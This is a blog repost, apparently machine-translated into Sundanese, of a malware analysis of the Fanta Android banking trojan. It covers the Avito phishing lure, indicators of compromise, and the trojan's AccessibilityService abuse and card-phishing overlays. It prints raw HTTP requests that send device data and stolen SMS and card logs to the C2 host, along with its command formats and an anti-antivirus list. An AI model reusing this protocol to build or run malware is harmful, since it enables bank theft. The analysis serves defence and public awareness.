ProHoster > Blog > warta internét > Leysya, Fanta: taktik anyar pikeun Trojan Android heubeul

Leysya, Fanta: taktik anyar pikeun Trojan Android heubeul

Leysya, Fanta: taktik anyar pikeun Trojan Android heubeul

Hiji dinten anjeun badé ngajual barang dina Avito sareng, saatos masangkeun katerangan lengkep ngeunaan produk anjeun (contona, modul RAM), anjeun bakal nampi pesen ieu:

Leysya, Fanta: taktik anyar pikeun Trojan Android heubeulSakali anjeun muka tautan, anjeun bakal ningali halaman anu katingalina teu bahaya ngabéjaan anjeun, anu ngajual anu bagja sareng suksés, yén pameseran parantos dilakukeun:

Leysya, Fanta: taktik anyar pikeun Trojan Android heubeul
Sakali anjeun klik tombol "Teruskeun", hiji file APK kalawan ikon jeung ngaran kapercayaan-mereun bakal diundeur ka alat Android Anjeun. Anjeun masang aplikasi anu kusabab sababaraha alesan nyuhunkeun hak AccessibilityService, teras sababaraha windows nembongan sareng gancang ngaleungit sareng... Nya kitu.

Anjeun badé pariksa kasaimbangan anjeun, tapi kusabab sababaraha alesan aplikasi perbankan anjeun naroskeun deui detil kartu anjeun. Saatos ngalebetkeun data, aya kajadian anu pikasieuneun: pikeun sababaraha alesan masih teu jelas pikeun anjeun, artos mimiti ngaleungit tina akun anjeun. Anjeun nyobian ngabéréskeun masalah, tapi telepon anjeun nolak: pencét tombol "Balik" sareng "Imah", henteu pareum sareng henteu ngamungkinkeun anjeun ngaktipkeun ukuran kaamanan. Hasilna, anjeun ditinggalkeun tanpa duit, barang anjeun teu acan dibeuli, anjeun bingung tur heran: naon anu lumangsung?

Jawabanna basajan: anjeun parantos janten korban Android Trojan Fanta, anggota kulawarga Flexnet. Kumaha ieu kajadian? Hayu urang ngajelaskeun ayeuna.

Pangarang: Andrey Polovinkin, spesialis junior dina analisis malware, Ivan Pisarev, spesialis dina analisis malware.

Sababaraha statistik

Kulawarga Flexnet tina Android Trojans mimiti dikenal deui dina 2015. Salila période aktivitas anu cukup panjang, kulawarga dilegaan ka sababaraha subspésiés: Fanta, Limebot, Lipton, jsb. The Trojan, kitu ogé infrastruktur pakait sareng eta, teu nangtung kénéh: schemes distribution éféktif anyar keur dimekarkeun - bisi urang, kualitas luhur kaca phishing aimed di pamaké-seller husus, sarta pamekar Trojan nuturkeun tren fashionable di. nulis virus - nambahkeun fungsionalitas anyar nu ngamungkinkeun pikeun maok duit leuwih éfisién tina alat kainféksi jeung mékanisme panyalindungan bypass.

Kampanye anu dijelaskeun dina tulisan ieu ditujukeun pikeun pangguna ti Rusia; sajumlah leutik alat anu katépaan kacatet di Ukraina, bahkan langkung saeutik di Kazakhstan sareng Bélarus.

Sanajan Flexnet geus di arena Android Trojan pikeun leuwih 4 taun ayeuna sarta geus diulik di jéntré ku loba peneliti, éta kénéh dina kaayaan alus. Dimimitian ti Januari 2019, jumlah potensi karuksakan leuwih ti 35 juta rubles - sarta ieu ngan keur kampanye di Rusia. Dina 2015, rupa-rupa vérsi Trojan Android ieu dijual dina panglawungan bawah tanah, dimana kodeu sumber Trojan kalawan déskripsi lengkep bisa ogé kapanggih. Ieu ngandung harti yén statistik karuksakan di dunya malah leuwih impressive. Henteu janten indikator anu goréng pikeun jalma sepuh sapertos kitu, sanés?

Leysya, Fanta: taktik anyar pikeun Trojan Android heubeul

Ti dijual ka tipu daya

Salaku bisa ditempo ti screenshot saméméhna dibere kaca phishing pikeun layanan Internet pikeun ngeposkeun Iklan Avito, éta disiapkeun pikeun korban husus. Tétéla, panyerang ngagunakeun salah sahiji parser Avito, anu ékstrak nomer telepon sareng nami anu ngajual, ogé déskripsi produk. Saatos ngalegaan halaman sareng nyiapkeun file APK, korban dikirim SMS kalayan namina sareng tautan ka halaman phishing anu ngandung pedaran produkna sareng jumlah anu ditampi tina "diobral" produk. Ku ngaklik tombol, pangguna nampi file APK jahat - Fanta.

Panaliti ngeunaan domain shcet491 [.]ru nunjukkeun yén éta didelegasikeun ka server DNS Hostinger:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

File zone domain ngandung éntri ngarah ka alamat IP 31.220.23[.]236, 31.220.23[.]243, jeung 31.220.23[.]235. Sanajan kitu, catetan sumberdaya primér domain urang (A catetan) nunjuk ka server kalawan alamat IP 178.132.1[.]240.

Alamat IP 178.132.1[.]240 aya di Walanda sareng milik hoster. WorldStream. alamat IP 31.220.23 [.] 235, 31.220.23 [.] 236 jeung 31.220.23 [.] 243 lokasina di Inggris sarta milik dibagikeun hosting server HOSTINGER. Dipaké salaku recorder a openprov-ru. Domain di handap ieu ogé direngsekeun ka alamat IP 178.132.1[.]240:

  • sdelka-ru[.]ru
  • tovar-av [.]ru
  • av-tovar[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

Ieu kudu dicatet yén tumbu dina format di handap ieu sadia ti ampir sakabéh domain:

http://(www.){0,1}<%domain%>/[0-9]{7}

Citakan ieu ogé kalebet tautan tina pesen SMS. Dumasar data sajarah, kapanggih yén hiji domain pakait jeung sababaraha tumbu dina pola ditétélakeun di luhur, nu nunjukkeun yén hiji domain dipaké pikeun ngadistribusikaeun Trojan ka sababaraha korban.

Hayu urang luncat ka hareup saeutik: nu Trojan diundeur via link ti SMS ngagunakeun alamat salaku server kontrol onusedseddohap [.]klub. Domain ieu didaptarkeun dina 2019-03-12, sareng mimitian ti 2019-04-29, aplikasi APK berinteraksi sareng domain ieu. Dumasar data anu dicandak tina VirusTotal, jumlahna aya 109 aplikasi berinteraksi sareng server ieu. The domain sorangan ngumbar ka alamat IP 217.23.14[.]27, lokasina di Walanda sarta dipiboga ku hoster WorldStream. Dipaké salaku recorder a namecheap. Domain ogé ngumbar ka alamat IP ieu bad-racoon [.]klub (dimimitian ti 2018-09-25) jeung bad-racoon[.]hirup (dimimitian ti 2018-10-25). Kalawan domain bad-racoon [.]klub leuwih ti 80 file APK berinteraksi sareng bad-racoon[.]hirup - leuwih ti 100.

Sacara umum, serangan lumangsung saperti kieu:

Leysya, Fanta: taktik anyar pikeun Trojan Android heubeul

Naon anu aya di handapeun tutup Fanta?

Sapertos seueur Trojan Android anu sanés, Fanta sanggup maca sareng ngirim pesen SMS, ngadamel pamundut USSD, sareng nampilkeun windows sorangan dina luhureun aplikasi (kaasup perbankan). Nanging, arsenal fungsionalitas kulawarga ieu parantos sumping: Fanta mimiti dianggo AccessibilityService pikeun sagala rupa kaperluan: maca eusi bewara ti aplikasi sejenna, nyegah deteksi jeung ngeureunkeun palaksanaan Trojan dina alat nu kainféksi, jsb. Fanta dianggo dina sadaya vérsi Android henteu langkung ngora ti 4.4. Dina artikel ieu kami bakal ningali langkung caket kana conto Fanta ieu:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Langsung saatos peluncuran

Langsung saatos peluncuran, Trojan nyumput ikon na. Aplikasi ngan ukur tiasa jalan upami nami alat anu katépaan henteu aya dina daptar:

  • android_x86
  • VirtualBox
  • Nexus 5X (bulhead)
  • Nexus 5 (silet)

Pamariksaan ieu dilaksanakeun dina layanan utama Trojan - MainService. Nalika diluncurkeun pikeun kahiji kalina, parameter konfigurasi aplikasi diinisialisasi kana nilai standar (format pikeun nyimpen data konfigurasi sareng hartosna bakal dibahas engké), sareng alat anu katépaan anyar didaptarkeun dina server kontrol. Paménta HTTP POST sareng jinis pesen bakal dikirim ka server register_bot sareng inpormasi ngeunaan alat anu kainféksi (versi Android, IMEI, nomer telepon, nami operator sareng kode nagara dimana operator kadaptar). Alamat fungsina salaku server kontrol hXXp: // onuseseddohap [.] club/controller.php. Salaku réspon, server ngirim pesen anu ngandung sawah bot_id, bot_pwd, server - aplikasi nyimpen nilai ieu salaku parameter tina server CnC. Parameter server opsional upami sawah henteu nampi: Fanta nganggo alamat pendaptaran - hXXp: // onuseseddohap [.] club/controller.php. Fungsi ngarobah alamat CnC tiasa dianggo pikeun ngarengsekeun dua masalah: pikeun ngadistribusikaeun beban sacara merata antara sababaraha server (upami aya sajumlah ageung alat anu kainféksi, beban dina pangladén wéb anu henteu dioptimalkeun tiasa luhur), sareng ogé pikeun dianggo. server alternatif lamun gagal salah sahiji server CnC.

Upami aya kasalahan nalika ngirim pamundut, Trojan bakal ngulang prosés pendaptaran saatos 20 detik.

Sakali alat parantos suksés didaptarkeun, Fanta bakal nampilkeun pesen di handap ieu ka pangguna:

Leysya, Fanta: taktik anyar pikeun Trojan Android heubeul
Catetan penting: jasa disebut Kaamanan Sistim — ngaran layanan Trojan, sarta sanggeus ngaklik tombol OK Jandéla bakal dibuka sareng setélan Aksesibilitas alat anu katépaan, dimana pangguna kedah masihan hak Aksesibilitas pikeun jasa jahat:

Leysya, Fanta: taktik anyar pikeun Trojan Android heubeul
Pas pamaké ngahurungkeun AccessibilityService, Fanta meunang aksés kana eusi jandéla aplikasi sareng tindakan anu dilakukeun dina éta:

Leysya, Fanta: taktik anyar pikeun Trojan Android heubeul
Langsung saatos nampi hak Aksesibilitas, Trojan naroskeun hak administrator sareng hak pikeun maca bewara:

Leysya, Fanta: taktik anyar pikeun Trojan Android heubeul
Ngagunakeun AccessibilityService, aplikasi simulates keystrokes, sahingga masihan sorangan sagala hak diperlukeun.

Fanta nyiptakeun sababaraha instansi database (anu bakal dijelaskeun engké) perlu pikeun nyimpen data konfigurasi, kitu ogé informasi dikumpulkeun dina prosés ngeunaan alat kainféksi. Pikeun ngirim inpo nu dikumpulkeun, Trojan nyieun tugas ngulang dirancang pikeun ngundeur widang tina database jeung narima paréntah ti server kontrol. Interval pikeun ngakses CnC diatur gumantung kana versi Android: dina kasus 5.1, interval bakal 10 detik, disebutkeun 60 detik.

Pikeun nampa paréntah, Fanta nyieun pamundut GetTask ka server manajemén. Salaku réspon, CnC tiasa ngirim salah sahiji paréntah di handap ieu:

regu gambaran
0 Kirim pesen SMS
1 Nelepon telepon atawa paréntah USSD
2 Ngamutahirkeun parameter interval
3 Ngamutahirkeun parameter intercept
6 Ngamutahirkeun parameter smsManager
9 Mimiti ngumpulkeun pesen SMS
11 Reset telepon anjeun ka setelan pabrik
12 Aktipkeun / Nonaktipkeun logging tina kreasi kotak dialog

Fanta ogé ngumpulkeun béwara ti 70 aplikasi perbankan, sistem pamayaran gancang sareng e-dompet sareng nyimpenna dina pangkalan data.

Nyimpen parameter konfigurasi

Pikeun nyimpen parameter konfigurasi, Fanta ngagunakeun pendekatan standar pikeun platform Android - Tanya-berkas. Setelan bakal disimpen kana file ngaranna setélan. Katerangan ngeunaan parameter anu disimpen aya dina tabel di handap ieu.

nami Nilai standar Nilai mungkin gambaran
id 0 integer ID bot
server hXXp://onuseseddohap[.]club/ URL Alamat server kontrol
pwd - tali Sandi server
interval 20 integer Interval waktos. Nunjukkeun sabaraha lila tugas-tugas di handap ieu kedah ditunda:

  • Nalika ngirim pamundut ngeunaan status pesen SMS anu dikirim
  • Narima paréntah anyar ti server manajemén
intercept sadaya sadaya / telNumber Lamun sawah sarua jeung string sadaya atawa telNumber, teras pesen SMS anu ditampi bakal dicegat ku aplikasi sareng henteu ditingalikeun ka pangguna
smsManager 0 0/1 Aktipkeun/nonaktipkeun aplikasi salaku panarima SMS standar
macaDialog palsu Leres/salah Aktipkeun / Nonaktipkeun logging acara AccessibilityAcara

Fanta ogé ngagunakeun file smsManager:

nami Nilai standar Nilai mungkin gambaran
pckg - tali Ngaran pangatur pesen SMS anu dianggo

Interaksi jeung database

Salila operasi na, Trojan ngagunakeun dua basis data. Database ngaranna a dipaké pikeun nyimpen rupa-rupa informasi dikumpulkeun ti telepon. Database kadua ngaranna fanta.db sarta dipaké pikeun nyimpen setélan jawab nyieun phishing jandéla dirancang pikeun ngumpulkeun informasi ngeunaan kartu bank.

Trojan ngagunakeun database а pikeun nyimpen inpormasi anu dikumpulkeun sareng log tindakan anjeun. Data disimpen dina tabél log. Pikeun nyieun tabel, paké query SQL di handap ieu:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Database ngandung inpormasi ieu:

1. Logging ngamimitian alat nu kainféksi ku pesen Telepon dihurungkeun!

2. Bewara ti aplikasi. Pesen dihasilkeun dumasar kana citakan ieu:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Data kartu Bank tina bentuk phishing dijieun ku Trojan. Parameter VIEW_NAME bisa jadi salah sahiji di handap ieu:

  • AliExpress
  • Avito
  • Google Play
  • Rupa-rupa

Pesen ieu asup dina format:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Pesen SMS asup/kaluar dina format:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Inpormasi ngeunaan pakét anu nyiptakeun kotak dialog dina format:

(<%Package name%>)<%Package information%>

Conto tabél log:

Leysya, Fanta: taktik anyar pikeun Trojan Android heubeul
Salah sahiji pungsionalitas Fanta nyaéta ngumpulkeun inpormasi ngeunaan kartu bank. Pangumpulan data lumangsung ngaliwatan kreasi jandéla phishing nalika muka aplikasi perbankan. Trojan nyiptakeun jandela phishing ngan sakali. Inpormasi yén jandela anu dipidangkeun ka pangguna disimpen dina méja setélan dina database fanta.db. Pikeun nyieun database, paké query SQL di handap ieu:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Sadaya widang méja setélan sacara standar diinisialisasi ka 1 (nyieun jandela phishing). Saatos pamaké ngasupkeun data maranéhanana, nilai bakal disetel ka 0. Conto widang tabel setélan:

  • can_login — lapangan tanggung jawab nampilkeun formulir nalika muka aplikasi perbankan
  • first_bank - teu dipaké
  • can_avito — lapangan tanggung jawab pikeun mintonkeun formulir nalika muka aplikasi Avito
  • can_ali — lapangan tanggung jawab pikeun mintonkeun formulir nalika muka aplikasi Aliexpress
  • bisa_lain - lapang tanggung jawab pikeun nunjukkeun formulir nalika muka aplikasi tina daptar: Yula, Pandao, Drom Otomatis, Dompét. Diskon jeung kartu bonus, Aviasales, booking, Trivago
  • can_card — lapangan tanggung jawab pikeun mintonkeun formulir nalika muka Google Play

Interaksi jeung server manajemén

Interaksi jaringan sareng server manajemén lumangsung via protokol HTTP. Pikeun damel sareng jaringan, Fanta nganggo perpustakaan Retrofit anu populér. Paménta dikirim ka: hXXp: // onuseseddohap [.] club/controller.php. Alamat server bisa dirobah nalika ngadaptar dina server. Cookies bisa dikirim salaku respon ti server. Fanta ngadamel pamenta di handap ieu ka server:

  • Pendaptaran bot dina server kontrol lumangsung sakali, sanggeus peluncuran munggaran. Data di handap ieu ngeunaan alat anu kainféksi dikirim ka server:
    · cookie - cookies nampi ti server (nilai standar mangrupikeun senar kosong)
    · mode - string konstan register_bot
    · awalan - integer konstan 2
    · version_sdk - kabentuk dumasar kana citakan ieu: /(Avit)
    · IMEI - IMEI tina alat anu kainféksi
    · nagara — kode nagara dimana operator kadaptar, dina format ISO
    · jumlah - nomer telepon
    · petugas - ngaran operator

    Conto pamundut anu dikirim ka server:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>

    Dina respon kana pamundut, server kudu balik hiji objek JSON ngandung parameter handap:
    · bot_id - ID alat anu kainféksi. Upami bot_id sami sareng 0, Fanta bakal ngaéksekusi deui pamundut éta.
    bot_pwd - sandi pikeun server.
    server - alamat server kontrol. Parameter pilihan. Upami parameterna henteu ditangtukeun, alamat anu disimpen dina aplikasi bakal dianggo.

    Contoh objek JSON:

    {
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}

  • Pamundut pikeun nampa paréntah ti server. Data di handap ieu dikirim ka server:
    · cookie - cookies nampi ti server
    · nawar - id tina alat anu kainféksi anu ditampi nalika ngirim pamundut register_bot
    · pwd -sandi pikeun server
    · divice_admin - widang nangtukeun naha hak administrator geus diala. Lamun hak administrator geus diala, sawah sarua jeung 1, sabalikna 0
    · diakses - Status operasi Service Aksesibilitas. Lamun jasa ieu dimimitian, nilai na 1, sabalikna 0
    · SMSManager — nunjukkeun naha Trojan diaktipkeun salaku aplikasi standar pikeun nampa SMS
    · layar - mintonkeun naon kaayaan layar dina. Nilai bakal disetel 1, lamun layar hurung, disebutkeun 0;

    Conto pamundut anu dikirim ka server:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Gumantung kana paréntahna, server tiasa ngabalikeun objek JSON kalayan parameter anu béda:

    · regu Kirim pesen SMS: Parameter ngandung nomer telepon, téks pesen SMS sareng ID pesen anu dikirim. Identifier dipaké nalika ngirim pesen ka server kalawan tipe setSmsStatus. 

    {
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}

    · regu Nelepon telepon atawa paréntah USSD: Nomer telepon atawa paréntah asalna dina awak respon. 

    {
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}

    · regu Robah parameter interval. 

    {
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}

    · regu Ngarobah parameter intercept. 

    {
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}

    · regu Robah widang SmsManager. 

    {
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

    · regu Kumpulkeun pesen SMS tina alat anu kainféksi.

    {
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}

    · regu Reset telepon anjeun ka setelan pabrik: 

    {
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}

    · regu Robah parameter ReadDialog. 

    {
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

  • Ngirim pesen nganggo jinis setSmsStatus. Paménta ieu dilakukeun saatos paréntah dieksekusi Kirim pesen SMS. Paménta sapertos kieu:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Unggah eusi database. Hiji baris dikirimkeun per pamundut. Data di handap ieu dikirim ka server:
    · cookie - cookies nampi ti server
    · mode - string konstan setSaveInboxSms
    · nawar - id tina alat anu kainféksi anu ditampi nalika ngirim pamundut register_bot
    · naskah - téks dina rékaman database ayeuna (field d tina méja log dina database а)
    · jumlah - ngaran rékaman database ayeuna (field p tina méja log dina database а)
    · sms_mode - nilai integer (widang m tina méja log dina database а)

    Paménta sapertos kieu:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    Lamun hasil dikirim ka server, baris bakal dihapus tina tabél. Conto objék JSON dipulangkeun ku server:

    {
    "response":[],
    "status":"ok"
}

Interaksi sareng AccessibilityService

AccessibilityService dilaksanakeun pikeun ngagampangkeun alat Android pikeun jalma anu cacad. Dina kalolobaan kasus, interaksi fisik diperlukeun pikeun berinteraksi sareng hiji aplikasi. AccessibilityService ngidinan Anjeun pikeun ngalakukeunana sacara terprogram. Fanta nganggo jasa pikeun nyiptakeun windows palsu dina aplikasi perbankan sareng nyegah pangguna muka setélan sistem sareng sababaraha aplikasi.

Ngagunakeun pungsionalitas AccessibilityService, Trojan ngawas parobahan elemen dina layar alat nu kainféksi. Sakumaha anu dijelaskeun sateuacana, setélan Fanta ngandung parameter anu tanggung jawab pikeun operasi log kalayan kotak dialog - macaDialog. Upami parameter ieu disetél, inpormasi ngeunaan nami sareng pedaran pakét anu micu kajadian bakal ditambah kana pangkalan data. Trojan ngalaksanakeun tindakan di handap ieu nalika kajadian dipicu:

  • Simulates mencét deui sareng konci bumi dina kasus ieu:
    · upami pangguna hoyong reboot alatna
    · upami pangguna hoyong ngahapus aplikasi "Avito" atanapi ngarobih hak aksés
    · lamun aya nyebut aplikasi "Avito" dina kaca
    · nalika muka aplikasi Google Play Protect
    · nalika muka kaca sareng setélan AccessibilityService
    · nalika kotak dialog System Security mucunghul
    · nalika muka halaman nganggo setélan "Draw over other app".
    · nalika muka halaman "Aplikasi", "Pamulihan sareng reset", "Reset data", "Reset setélan", "Panel pamekar", "Special. kasempetan", "Kasempetan husus", "Hak husus"
    · lamun acara ieu dihasilkeun ku aplikasi nu tangtu.

    Daptar aplikasi

    • android
    • Master Lite
    • Bérés bersih
    • Master bersih pikeun x86 CPU
    • Manajemén Idin Aplikasi Meizu
    • Kaamanan MIUI
    • Master Bersih - Antipirus & Cache sareng Pembersih Sampah
    • Kadali kolot sareng GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Web Security Beta
    • Virus Cleaner, Antivirus, Cleaner (MAX Security)
    • Mobile AntiVirus Kaamanan PRO
    • Antipirus Avast & panyalindungan gratis 2019
    • Mobile Kaamanan MegaFon
    • AVG Protection pikeun Xperia
    • Kaamanan Mobile
    • Malwarebytes Antipirus & Protection
    • Antipirus pikeun Android 2019
    • Master Kaamanan - Antipirus, VPN, AppLock, Booster
    • Antipirus AVG pikeun Manajer Sistem tablet Huawei
    • Samsung Aksesibilitas
    • Samsung Smart Manajer
    • Kaamanan Master
    • Laju Booster
    • dr.web
    • Spasi Kaamanan Dr.Web
    • Dr.Web Mobile Control Center
    • Dr.Web Kaamanan Spasi Kahirupan
    • Dr.Web Mobile Control Center
    • Antipirus & Kaamanan Mobile
    • Kaspersky Internet Security: Antipirus sareng Perlindungan
    • Kaspersky Batré Kahirupan: Saver & Booster
    • Kaspersky Endpoint Security - panyalindungan sareng manajemén
    • AVG Antivirus gratis 2019 - Perlindungan pikeun Android
    • Antipirus Android
    • Norton Mobile Kaamanan jeung Antipirus
    • Antipirus, firewall, VPN, kaamanan mobile
    • Kaamanan Mobile: antipirus, VPN, panyalindungan maling
    • Antipirus pikeun Android

  • Upami idin dipénta nalika ngirim pesen SMS ka nomer pondok, Fanta simulates ngaklik kotak centang Inget pilihan jeung tombol pikeun ngirim.
  • Nalika anjeun nyobian ngahapus hak administrator tina Trojan, éta ngonci layar telepon.
  • Nyegah nambahkeun pangurus anyar.
  • Lamun aplikasi antipirus dr.web kauninga anceman, Fanta imitates mencét tombol malire.
  • The Trojan simulates mencét deui jeung tombol home lamun acara ieu dihasilkeun ku aplikasi nu Kamanusaan sarta Studi Alat Samsung.
  • Fanta nyiptakeun phishing windows sareng formulir pikeun ngasupkeun inpormasi ngeunaan kartu bank upami aplikasi tina daptar sakitar 30 jasa Internét anu béda dibuka. Di antarana: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, jsb.

    Bentuk Phishing

    Fanta nganalisa aplikasi mana anu dijalankeun dina alat anu kainféksi. Upami aplikasi anu dipikaresep dibuka, Trojan nampilkeun jandela phishing di luhur sadaya anu sanés, anu mangrupikeun formulir pikeun ngalebetkeun inpormasi kartu bank. Pamaké kedah ngalebetkeun data ieu:

    • Nomer kartu
    • tanggal kadaluwarsa kartu
    • CVV
    • Ngaran Pemegang Kartu (henteu kanggo sadaya bank)

    Gumantung kana aplikasi anu ngajalankeun, windows phishing anu béda bakal ditingalikeun. Di handap ieu conto sababaraha di antarana:

    AliExpress:

    Leysya, Fanta: taktik anyar pikeun Trojan Android heubeul
    Avto:

    Leysya, Fanta: taktik anyar pikeun Trojan Android heubeul
    Pikeun sababaraha aplikasi sejenna, f.eks. Google Play Market, Aviasales, Pandao, Booking, Trivago:
    Leysya, Fanta: taktik anyar pikeun Trojan Android heubeul

    Kumaha bener éta

    Untungna, jalma anu nampi pesen SMS anu dijelaskeun dina awal tulisan éta janten spesialis cybersecurity. Ku alatan éta, nyata, versi non-diréktur urang béda ti hiji ngawartoskeun saméméhna: hiji jalma narima SMS metot, lajeng masihan ka tim Ancaman Hunting Intelligence Grup-IB. Hasil tina serangan nyaéta artikel ieu. Happy ending, leres? Nanging, henteu sadayana carita tungtungna suksés, sareng supados anjeun henteu katingali sapertos potongan sutradara kalayan kaleungitan artos, dina kalolobaan kasus éta cukup pikeun taat kana aturan anu parantos dijelaskeun di handap ieu:

    • ulah masang aplikasi pikeun alat sélulér nganggo OS Android tina sumber naon waé salian ti Google Play
    • Nalika masang aplikasi, perhatosan khusus kana hak anu dipénta ku aplikasi
    • nengetan ekstensi file diundeur
    • install apdet Android OS rutin
    • ulah nganjang ka sumber anu curiga sareng henteu ngaunduh file ti dinya
    • Entong klik tautan anu ditampi dina pesen SMS.

sumber: www.habr.com

Tambahkeun komentar